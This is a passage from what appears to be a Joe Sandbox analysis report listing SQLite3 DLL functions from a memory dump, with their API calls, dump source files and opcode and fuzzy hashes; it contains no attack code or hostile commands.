                                                                                                  Memory Dump Source
                                                                                                  • Source File: 0000000B.00000002.649402082.0000000061E01000.00000020.00000001.01000000.00000007.sdmp, Offset: 61E00000, based on PE: true
                                                                                                  • Associated: 0000000B.00000002.649397390.0000000061E00000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                  • Associated: 0000000B.00000002.649417599.0000000061E96000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                  • Associated: 0000000B.00000002.649422165.0000000061E98000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                  • Associated: 0000000B.00000002.649430077.0000000061EAA000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                  • Associated: 0000000B.00000002.649434745.0000000061EAB000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                  • Associated: 0000000B.00000002.649439374.0000000061EAE000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                  • Associated: 0000000B.00000002.649444348.0000000061EB1000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                                  • Associated: 0000000B.00000002.649448904.0000000061EB2000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_11_2_61e00000_convert.jbxd
                                                                                                  Similarity
                                                                                                  • API ID: sqlite3_mutex_entersqlite3_mutex_leave$sqlite3_configsqlite3_initializesqlite3_realloc64
                                                                                                  • String ID:
                                                                                                  • API String ID: 1177761455-0
                                                                                                  • Opcode ID: b47c86a4b05f7ac8acbff865afd01882df6996ccb508a56b7435c181797bcf22
                                                                                                  • Instruction ID: e04bdb1e155c4d8aa20e61285c6a2888ab4b05c20be94f1552d7127dcdf8dc43
                                                                                                  • Opcode Fuzzy Hash: b47c86a4b05f7ac8acbff865afd01882df6996ccb508a56b7435c181797bcf22
                                                                                                  • Instruction Fuzzy Hash: CC019A706487028BDB00AFA9D58061ABBE4EBCA358F28847DD94CCB310F339D891C791
                                                                                                  Function 61E903D0 Relevance: 6.0, APIs: 4, Instructions: 46COMMON
                                                                                                  Download Yara Rule
                                                                                                  APIs
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 0000000B.00000002.649402082.0000000061E01000.00000020.00000001.01000000.00000007.sdmp, Offset: 61E00000, based on PE: true
                                                                                                  • Associated: 0000000B.00000002.649397390.0000000061E00000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                  • Associated: 0000000B.00000002.649417599.0000000061E96000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                  • Associated: 0000000B.00000002.649422165.0000000061E98000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                  • Associated: 0000000B.00000002.649430077.0000000061EAA000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                  • Associated: 0000000B.00000002.649434745.0000000061EAB000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                  • Associated: 0000000B.00000002.649439374.0000000061EAE000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                  • Associated: 0000000B.00000002.649444348.0000000061EB1000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                                  • Associated: 0000000B.00000002.649448904.0000000061EB2000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_11_2_61e00000_convert.jbxd
                                                                                                  Similarity
                                                                                                  • API ID: __dllonexit_lock_onexit_unlock
                                                                                                  • String ID:
                                                                                                  • API String ID: 209411981-0
                                                                                                  • Opcode ID: 07742367f55d61d53813d7123b5886db0ccbcf0ca65f58ae6c5a9ed79f5283f3
                                                                                                  • Instruction ID: ce0efef4826bfe76aae18edee85d05d8edda80e93cf8ddb27c6369d96a1df9a0
                                                                                                  • Opcode Fuzzy Hash: 07742367f55d61d53813d7123b5886db0ccbcf0ca65f58ae6c5a9ed79f5283f3
                                                                                                  • Instruction Fuzzy Hash: E1117FB59197428FCB41EFB8C48851EBBE4AB89364F618D2EE8D4C7350E734D4848F82
                                                                                                  Function 61E28CC5 Relevance: 6.0, APIs: 4, Instructions: 45COMMON
                                                                                                  Download Yara Rule
                                                                                                  APIs
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 0000000B.00000002.649402082.0000000061E01000.00000020.00000001.01000000.00000007.sdmp, Offset: 61E00000, based on PE: true
                                                                                                  • Associated: 0000000B.00000002.649397390.0000000061E00000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                  • Associated: 0000000B.00000002.649417599.0000000061E96000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                  • Associated: 0000000B.00000002.649422165.0000000061E98000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                  • Associated: 0000000B.00000002.649430077.0000000061EAA000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                  • Associated: 0000000B.00000002.649434745.0000000061EAB000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                  • Associated: 0000000B.00000002.649439374.0000000061EAE000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                  • Associated: 0000000B.00000002.649444348.0000000061EB1000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                                  • Associated: 0000000B.00000002.649448904.0000000061EB2000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_11_2_61e00000_convert.jbxd
                                                                                                  Similarity
                                                                                                  • API ID: sqlite3_mutex_enter$sqlite3_freesqlite3_mutex_leave
                                                                                                  • String ID:
                                                                                                  • API String ID: 3222608360-0
                                                                                                  • Opcode ID: 890065f4f9e1266a6b9c5a80008cc7ae86d165bd6ff116f792c7132f80ce8763
                                                                                                  • Instruction ID: 38e167819f02cb3b61ebd52773ac32e22d059147a195bf4de655ff386c6af825
                                                                                                  • Opcode Fuzzy Hash: 890065f4f9e1266a6b9c5a80008cc7ae86d165bd6ff116f792c7132f80ce8763
                                                                                                  • Instruction Fuzzy Hash: A2010875604A129FCB10EFA8C4D4D09BBF4FF95358B258958E8488F305D330E995DBD1
                                                                                                  Function 61E0C62C Relevance: 6.0, APIs: 4, Instructions: 45COMMON
                                                                                                  Download Yara Rule
                                                                                                  APIs
                                                                                                  • sqlite3_free.SQLITE3 ref: 61E0C664
                                                                                                    • Part of subcall function 61E0A4AC: sqlite3_free.SQLITE3 ref: 61E0A4CD
                                                                                                  • sqlite3_free.SQLITE3 ref: 61E0C677
                                                                                                  • sqlite3_free.SQLITE3 ref: 61E0C659
                                                                                                    • Part of subcall function 61E09DA3: sqlite3_mutex_enter.SQLITE3 ref: 61E09DC2
                                                                                                  • sqlite3_free.SQLITE3 ref: 61E0C6A5
                                                                                                    • Part of subcall function 61E0A643: sqlite3_free.SQLITE3 ref: 61E0A654
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 0000000B.00000002.649402082.0000000061E01000.00000020.00000001.01000000.00000007.sdmp, Offset: 61E00000, based on PE: true
                                                                                                  • Associated: 0000000B.00000002.649397390.0000000061E00000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                  • Associated: 0000000B.00000002.649417599.0000000061E96000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                  • Associated: 0000000B.00000002.649422165.0000000061E98000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                  • Associated: 0000000B.00000002.649430077.0000000061EAA000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                  • Associated: 0000000B.00000002.649434745.0000000061EAB000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                  • Associated: 0000000B.00000002.649439374.0000000061EAE000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                  • Associated: 0000000B.00000002.649444348.0000000061EB1000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                                  • Associated: 0000000B.00000002.649448904.0000000061EB2000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_11_2_61e00000_convert.jbxd
                                                                                                  Similarity
                                                                                                  • API ID: sqlite3_free$sqlite3_mutex_enter
                                                                                                  • String ID:
                                                                                                  • API String ID: 3930042888-0
                                                                                                  • Opcode ID: d5966cd9acb5144b02b8b166dddd2bc4829bf4f5eecfc64748bab2bc8737370d
                                                                                                  • Instruction ID: 2867086f395d1067f0f98aa0e0836f174e6670869da2a4f0622b6bb8ec9c8e03
                                                                                                  • Opcode Fuzzy Hash: d5966cd9acb5144b02b8b166dddd2bc4829bf4f5eecfc64748bab2bc8737370d
                                                                                                  • Instruction Fuzzy Hash: E9017C71A442458BDB00AF78D8C095EF7F5EFC4316F21886DD8888B311DB75E9628B91
                                                                                                  Function 61E204D2 Relevance: 6.0, APIs: 4, Instructions: 39COMMON
                                                                                                  Download Yara Rule
                                                                                                  APIs
                                                                                                  • sqlite3_aggregate_context.SQLITE3 ref: 61E204E7
                                                                                                  • sqlite3_result_error.SQLITE3 ref: 61E20517
                                                                                                  • sqlite3_result_double.SQLITE3 ref: 61E2052D
                                                                                                  • sqlite3_result_int64.SQLITE3 ref: 61E20545
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 0000000B.00000002.649402082.0000000061E01000.00000020.00000001.01000000.00000007.sdmp, Offset: 61E00000, based on PE: true
                                                                                                  • Associated: 0000000B.00000002.649397390.0000000061E00000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                  • Associated: 0000000B.00000002.649417599.0000000061E96000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                  • Associated: 0000000B.00000002.649422165.0000000061E98000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                  • Associated: 0000000B.00000002.649430077.0000000061EAA000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                  • Associated: 0000000B.00000002.649434745.0000000061EAB000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                  • Associated: 0000000B.00000002.649439374.0000000061EAE000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                  • Associated: 0000000B.00000002.649444348.0000000061EB1000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                                  • Associated: 0000000B.00000002.649448904.0000000061EB2000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_11_2_61e00000_convert.jbxd
                                                                                                  Similarity
                                                                                                  • API ID: sqlite3_aggregate_contextsqlite3_result_doublesqlite3_result_errorsqlite3_result_int64
                                                                                                  • String ID:
                                                                                                  • API String ID: 3779139978-0
                                                                                                  • Opcode ID: 31cfdfb72a3ef8b31b65cd009abcb28664c833cbe250a8d73bff1eb397b64cc1
                                                                                                  • Instruction ID: 295fe6b4fd93688085d53bc22d2522263825a5212ecf39742e6b0f0b4f1f1b81
                                                                                                  • Opcode Fuzzy Hash: 31cfdfb72a3ef8b31b65cd009abcb28664c833cbe250a8d73bff1eb397b64cc1
                                                                                                  • Instruction Fuzzy Hash: 22012CB04497459FE720AF24C4A475ABFE5EF85328F25C99DE4988B2E2C774C484DB42
                                                                                                  Function 61E18B81 Relevance: 6.0, APIs: 4, Instructions: 38stringCOMMON
                                                                                                  Download Yara Rule
                                                                                                  APIs
                                                                                                  • sqlite3_initialize.SQLITE3 ref: 61E18B8F
                                                                                                    • Part of subcall function 61E1882F: sqlite3_mutex_enter.SQLITE3(?,?,?,?,?,?,00000000,?,?,?,61E1F51B), ref: 61E18866
                                                                                                    • Part of subcall function 61E1882F: sqlite3_config.SQLITE3(?,?,?,?,?,?,?,?,?,?,?,?,?,?,61E236D5), ref: 61E1889A
                                                                                                    • Part of subcall function 61E1882F: sqlite3_mutex_leave.SQLITE3(?,?,?,?,?,?,00000000,?,?,?,61E1F51B), ref: 61E18B72
                                                                                                  • sqlite3_mutex_enter.SQLITE3 ref: 61E18BA7
                                                                                                  • strcmp.MSVCRT ref: 61E18BC4
                                                                                                  • sqlite3_mutex_leave.SQLITE3 ref: 61E18BD5
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 0000000B.00000002.649402082.0000000061E01000.00000020.00000001.01000000.00000007.sdmp, Offset: 61E00000, based on PE: true
                                                                                                  • Associated: 0000000B.00000002.649397390.0000000061E00000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                  • Associated: 0000000B.00000002.649417599.0000000061E96000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                  • Associated: 0000000B.00000002.649422165.0000000061E98000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                  • Associated: 0000000B.00000002.649430077.0000000061EAA000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                  • Associated: 0000000B.00000002.649434745.0000000061EAB000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                  • Associated: 0000000B.00000002.649439374.0000000061EAE000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                  • Associated: 0000000B.00000002.649444348.0000000061EB1000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                                  • Associated: 0000000B.00000002.649448904.0000000061EB2000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_11_2_61e00000_convert.jbxd
                                                                                                  Similarity
                                                                                                  • API ID: sqlite3_mutex_entersqlite3_mutex_leave$sqlite3_configsqlite3_initializestrcmp
                                                                                                  • String ID:
                                                                                                  • API String ID: 2933023327-0
                                                                                                  • Opcode ID: e00cc02862850e4d1e70a17c946c6434dc14f78d33407ded7532a8b895816926
                                                                                                  • Instruction ID: 03df8f12e84b75e98625b95cf98b54c11d1812f328ab80b23fb2d37108781fec
                                                                                                  • Opcode Fuzzy Hash: e00cc02862850e4d1e70a17c946c6434dc14f78d33407ded7532a8b895816926
                                                                                                  • Instruction Fuzzy Hash: 7EF06DB560C3955BD7106FE98481E5BBBA8FB8126CF24853CD9888B309D720E82097A1
                                                                                                  Function 61E8F363 Relevance: 6.0, APIs: 4, Instructions: 23COMMON
                                                                                                  Download Yara Rule
                                                                                                  APIs
                                                                                                  • sqlite3_initialize.SQLITE3 ref: 61E8F36A
                                                                                                    • Part of subcall function 61E1882F: sqlite3_mutex_enter.SQLITE3(?,?,?,?,?,?,00000000,?,?,?,61E1F51B), ref: 61E18866
                                                                                                    • Part of subcall function 61E1882F: sqlite3_config.SQLITE3(?,?,?,?,?,?,?,?,?,?,?,?,?,?,61E236D5), ref: 61E1889A
                                                                                                    • Part of subcall function 61E1882F: sqlite3_mutex_leave.SQLITE3(?,?,?,?,?,?,00000000,?,?,?,61E1F51B), ref: 61E18B72
                                                                                                  • sqlite3_mutex_enter.SQLITE3 ref: 61E8F382
                                                                                                  • sqlite3_free.SQLITE3 ref: 61E8F38F
                                                                                                    • Part of subcall function 61E09DA3: sqlite3_mutex_enter.SQLITE3 ref: 61E09DC2
                                                                                                  • sqlite3_mutex_leave.SQLITE3 ref: 61E8F3AB
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 0000000B.00000002.649402082.0000000061E01000.00000020.00000001.01000000.00000007.sdmp, Offset: 61E00000, based on PE: true
                                                                                                  • Associated: 0000000B.00000002.649397390.0000000061E00000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                  • Associated: 0000000B.00000002.649417599.0000000061E96000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                  • Associated: 0000000B.00000002.649422165.0000000061E98000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                  • Associated: 0000000B.00000002.649430077.0000000061EAA000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                  • Associated: 0000000B.00000002.649434745.0000000061EAB000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                  • Associated: 0000000B.00000002.649439374.0000000061EAE000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                  • Associated: 0000000B.00000002.649444348.0000000061EB1000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                                  • Associated: 0000000B.00000002.649448904.0000000061EB2000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_11_2_61e00000_convert.jbxd
                                                                                                  Similarity
                                                                                                  • API ID: sqlite3_mutex_enter$sqlite3_mutex_leave$sqlite3_configsqlite3_freesqlite3_initialize
                                                                                                  • String ID:
                                                                                                  • API String ID: 3512769177-0
                                                                                                  • Opcode ID: 308d4317a24e9a1e062a99ba5130f1256415bc6b97fc7d421c6cc08406febdd8
                                                                                                  • Instruction ID: 216bfda9a3586c1568b4f2373f1b57d9510823fa3e270fb7c2b473c94ec4bc7b
                                                                                                  • Opcode Fuzzy Hash: 308d4317a24e9a1e062a99ba5130f1256415bc6b97fc7d421c6cc08406febdd8
                                                                                                  • Instruction Fuzzy Hash: 70E01AB09987424BDB007FB8858571AB6E8AB8231DF65446CC54C8B301E7B5C0A4C792
                                                                                                  Function 61E2F2BD Relevance: 5.7, APIs: 1, Strings: 2, Instructions: 437COMMON
                                                                                                  Download Yara Rule
                                                                                                  APIs
                                                                                                  Strings
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 0000000B.00000002.649402082.0000000061E01000.00000020.00000001.01000000.00000007.sdmp, Offset: 61E00000, based on PE: true
                                                                                                  • Associated: 0000000B.00000002.649397390.0000000061E00000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                  • Associated: 0000000B.00000002.649417599.0000000061E96000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                  • Associated: 0000000B.00000002.649422165.0000000061E98000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                  • Associated: 0000000B.00000002.649430077.0000000061EAA000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                  • Associated: 0000000B.00000002.649434745.0000000061EAB000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                  • Associated: 0000000B.00000002.649439374.0000000061EAE000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                  • Associated: 0000000B.00000002.649444348.0000000061EB1000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                                  • Associated: 0000000B.00000002.649448904.0000000061EB2000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_11_2_61e00000_convert.jbxd
                                                                                                  Similarity
                                                                                                  • API ID: sqlite3_strlike
                                                                                                  • String ID: \$m
                                                                                                  • API String ID: 933858916-1477243525
                                                                                                  • Opcode ID: 4df23a05ebe4d32d1a0d6b9bc262a2eafa01188588494d5f36dad20182dd3aa8
                                                                                                  • Instruction ID: 22a5bdfc68ea54f9d6e718c9b8f3d84236f98e67e179402f3b8d24091964d061
                                                                                                  • Opcode Fuzzy Hash: 4df23a05ebe4d32d1a0d6b9bc262a2eafa01188588494d5f36dad20182dd3aa8
                                                                                                  • Instruction Fuzzy Hash: 0D12B074A042498FDB40DFA8C990A9DBBF1FF88314F20852DE899EB345D739E856CB51
                                                                                                  Function 61E06B80 Relevance: 5.4, APIs: 1, Strings: 2, Instructions: 101COMMON
                                                                                                  Download Yara Rule
                                                                                                  APIs
                                                                                                  Strings
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 0000000B.00000002.649402082.0000000061E01000.00000020.00000001.01000000.00000007.sdmp, Offset: 61E00000, based on PE: true
                                                                                                  • Associated: 0000000B.00000002.649397390.0000000061E00000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                  • Associated: 0000000B.00000002.649417599.0000000061E96000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                  • Associated: 0000000B.00000002.649422165.0000000061E98000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                  • Associated: 0000000B.00000002.649430077.0000000061EAA000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                  • Associated: 0000000B.00000002.649434745.0000000061EAB000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                  • Associated: 0000000B.00000002.649439374.0000000061EAE000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                  • Associated: 0000000B.00000002.649444348.0000000061EB1000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                                  • Associated: 0000000B.00000002.649448904.0000000061EB2000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_11_2_61e00000_convert.jbxd
                                                                                                  Similarity
                                                                                                  • API ID: sqlite3_strnicmp
                                                                                                  • String ID: '$null
                                                                                                  • API String ID: 1961171630-2611297978
                                                                                                  • Opcode ID: c4a6c3e23027ebe337c23818f37bfc876e5ba6e756dd0a0dd82ddf8a6e418c38
                                                                                                  • Instruction ID: c74abc8e8844f4f78686a038f2b34f2915e9782f8624408a951ba13de51aa9ab
                                                                                                  • Opcode Fuzzy Hash: c4a6c3e23027ebe337c23818f37bfc876e5ba6e756dd0a0dd82ddf8a6e418c38
                                                                                                  • Instruction Fuzzy Hash: 0831D960E4D5C64EF71889B4C4E5392BBD3EB8E30AFBCC1A4C1454E28AE625C4F64741
                                                                                                  Function 61E28AE5 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 91COMMON
                                                                                                  Download Yara Rule
                                                                                                  APIs
                                                                                                  • sqlite3_win32_is_nt.SQLITE3 ref: 61E28B1F
                                                                                                    • Part of subcall function 61E1819C: InterlockedCompareExchange.KERNEL32 ref: 61E181BC
                                                                                                    • Part of subcall function 61E1819C: InterlockedCompareExchange.KERNEL32 ref: 61E18203
                                                                                                    • Part of subcall function 61E1819C: InterlockedCompareExchange.KERNEL32 ref: 61E18223
                                                                                                    • Part of subcall function 61E18126: sqlite3_win32_sleep.SQLITE3 ref: 61E1817E
                                                                                                  • sqlite3_free.SQLITE3 ref: 61E28BEA
                                                                                                  Strings
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 0000000B.00000002.649402082.0000000061E01000.00000020.00000001.01000000.00000007.sdmp, Offset: 61E00000, based on PE: true
                                                                                                  • Associated: 0000000B.00000002.649397390.0000000061E00000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                  • Associated: 0000000B.00000002.649417599.0000000061E96000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                  • Associated: 0000000B.00000002.649422165.0000000061E98000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                  • Associated: 0000000B.00000002.649430077.0000000061EAA000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                  • Associated: 0000000B.00000002.649434745.0000000061EAB000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                  • Associated: 0000000B.00000002.649439374.0000000061EAE000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                  • Associated: 0000000B.00000002.649444348.0000000061EB1000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                                  • Associated: 0000000B.00000002.649448904.0000000061EB2000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_11_2_61e00000_convert.jbxd
                                                                                                  Similarity
                                                                                                  • API ID: CompareExchangeInterlocked$sqlite3_freesqlite3_win32_is_ntsqlite3_win32_sleep
                                                                                                  • String ID: winDelete
                                                                                                  • API String ID: 3336177498-3936022152
                                                                                                  • Opcode ID: 5e975ca9913f1a798b252d13ef767750dfea483affb44fc180078fed29ff91ba
                                                                                                  • Instruction ID: 6482658e2346da73d5fe47b78c5716a80812437cd6314f6894a8bf078ebed901
                                                                                                  • Opcode Fuzzy Hash: 5e975ca9913f1a798b252d13ef767750dfea483affb44fc180078fed29ff91ba
                                                                                                  • Instruction Fuzzy Hash: 5831C5B4A0860ACBEF015FA4C8A4E9EB7F5EF46318F20C92DE86297340D734D445DB52
                                                                                                  Function 61E907F0 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 81memoryCOMMON
                                                                                                  Download Yara Rule
                                                                                                  APIs
                                                                                                  Strings
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 0000000B.00000002.649402082.0000000061E01000.00000020.00000001.01000000.00000007.sdmp, Offset: 61E00000, based on PE: true
                                                                                                  • Associated: 0000000B.00000002.649397390.0000000061E00000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                  • Associated: 0000000B.00000002.649417599.0000000061E96000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                  • Associated: 0000000B.00000002.649422165.0000000061E98000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                  • Associated: 0000000B.00000002.649430077.0000000061EAA000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                  • Associated: 0000000B.00000002.649434745.0000000061EAB000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                  • Associated: 0000000B.00000002.649439374.0000000061EAE000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                  • Associated: 0000000B.00000002.649444348.0000000061EB1000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                                  • Associated: 0000000B.00000002.649448904.0000000061EB2000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_11_2_61e00000_convert.jbxd
                                                                                                  Similarity
                                                                                                  • API ID: Virtual$ProtectQuery
                                                                                                  • String ID: @
                                                                                                  • API String ID: 1027372294-2766056989
                                                                                                  • Opcode ID: 16539bb7399f82f75134208b008dfa96f15cde7e446fb917dabdf9e4da613200
                                                                                                  • Instruction ID: dd9ebaceb483f3274dd68185fda66448c5e9e582063250e5e1b5878e3cc19a0b
                                                                                                  • Opcode Fuzzy Hash: 16539bb7399f82f75134208b008dfa96f15cde7e446fb917dabdf9e4da613200
                                                                                                  • Instruction Fuzzy Hash: 433127B2A147018FE711DF68C58461AFBE4FF84364F95C918E859DB250E730E8848B92
                                                                                                  Function 61E132D1 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 60COMMON
                                                                                                  Download Yara Rule
                                                                                                  APIs
                                                                                                  • sqlite3_mutex_enter.SQLITE3 ref: 61E132EE
                                                                                                  • sqlite3_mutex_leave.SQLITE3 ref: 61E13363
                                                                                                    • Part of subcall function 61E13056: sqlite3_mutex_try.SQLITE3(?,?,?,61E130D6), ref: 61E12FF6
                                                                                                  Strings
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 0000000B.00000002.649402082.0000000061E01000.00000020.00000001.01000000.00000007.sdmp, Offset: 61E00000, based on PE: true
                                                                                                  • Associated: 0000000B.00000002.649397390.0000000061E00000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                  • Associated: 0000000B.00000002.649417599.0000000061E96000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                  • Associated: 0000000B.00000002.649422165.0000000061E98000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                  • Associated: 0000000B.00000002.649430077.0000000061EAA000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                  • Associated: 0000000B.00000002.649434745.0000000061EAB000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                  • Associated: 0000000B.00000002.649439374.0000000061EAE000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                  • Associated: 0000000B.00000002.649444348.0000000061EB1000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                                  • Associated: 0000000B.00000002.649448904.0000000061EB2000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_11_2_61e00000_convert.jbxd
                                                                                                  Similarity
                                                                                                  • API ID: sqlite3_mutex_entersqlite3_mutex_leavesqlite3_mutex_try
                                                                                                  • String ID: #
                                                                                                  • API String ID: 2389339727-1885708031
                                                                                                  • Opcode ID: af9444c5cc060ac8e6d350920f867b89b35833cb7365d0d911d3e3aa74f29a90
                                                                                                  • Instruction ID: c911ec7246670608747aec59530441a8e91607b55089781b66d73f3b134d3b41
                                                                                                  • Opcode Fuzzy Hash: af9444c5cc060ac8e6d350920f867b89b35833cb7365d0d911d3e3aa74f29a90
                                                                                                  • Instruction Fuzzy Hash: A0112B74A08246CFDB14DFA9D48195EB7B4FF89368F64C529E8248B305DB30E951CB94
                                                                                                  Function 61E03A76 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 58COMMON
                                                                                                  Download Yara Rule
                                                                                                  APIs
                                                                                                  • sqlite3_stricmp.SQLITE3(00000000,?,?,61E6200B), ref: 61E03AF0
                                                                                                  Strings
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 0000000B.00000002.649402082.0000000061E01000.00000020.00000001.01000000.00000007.sdmp, Offset: 61E00000, based on PE: true
                                                                                                  • Associated: 0000000B.00000002.649397390.0000000061E00000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                  • Associated: 0000000B.00000002.649417599.0000000061E96000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                  • Associated: 0000000B.00000002.649422165.0000000061E98000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                  • Associated: 0000000B.00000002.649430077.0000000061EAA000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                  • Associated: 0000000B.00000002.649434745.0000000061EAB000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                  • Associated: 0000000B.00000002.649439374.0000000061EAE000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                  • Associated: 0000000B.00000002.649444348.0000000061EB1000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                                  • Associated: 0000000B.00000002.649448904.0000000061EB2000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_11_2_61e00000_convert.jbxd
                                                                                                  Similarity
